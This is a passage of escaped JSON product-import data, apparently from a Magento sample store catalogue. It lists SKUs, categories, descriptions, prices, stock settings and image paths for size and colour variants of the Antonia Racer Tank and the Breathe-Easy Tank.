min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1744\":{\"sku\":\"WT08-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-L-Purple\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1745\":{\"sku\":\"WT08-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-L-Yellow\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1746\":{\"sku\":\"WT08-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-XL-Black\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1747\":{\"sku\":\"WT08-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-XL-Purple\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1748\":{\"sku\":\"WT08-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank-XL-Yellow\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"antonia-racer-tank-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1749\":{\"sku\":\"WT08\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Antonia Racer Tank\",\"description\":\"<p>You won\'t know what you like best about the Antonia Racer Tank: soft, stretchy, lightweight fabric? Super-cute colorblocked details? Whatever it is, this piece is sure to quickly move to the top of your workout rotation.<\\/p>\\n<p>&bull; Machine wash.<br \\/>&bull; Line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=HeatTec&reg;|Nylon|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT08-XS-Black,size=XS,color=Black|sku=WT08-XS-Purple,size=XS,color=Purple|sku=WT08-XS-Yellow,size=XS,color=Yellow|sku=WT08-S-Black,size=S,color=Black|sku=WT08-S-Purple,size=S,color=Purple|sku=WT08-S-Yellow,size=S,color=Yellow|sku=WT08-M-Black,size=M,color=Black|sku=WT08-M-Purple,size=M,color=Purple|sku=WT08-M-Yellow,size=M,color=Yellow|sku=WT08-L-Black,size=L,color=Black|sku=WT08-L-Purple,size=L,color=Purple|sku=WT08-L-Yellow,size=L,color=Yellow|sku=WT08-XL-Black,size=XL,color=Black|sku=WT08-XL-Purple,size=XL,color=Purple|sku=WT08-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"image\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt08-black_alt1.jpg,\\/w\\/t\\/wt08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"HeatTec&reg;|Nylon|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1750\":{\"sku\":\"WT09-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-XS-Purple\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1751\":{\"sku\":\"WT09-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-XS-White\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1752\":{\"sku\":\"WT09-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-XS-Yellow\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; 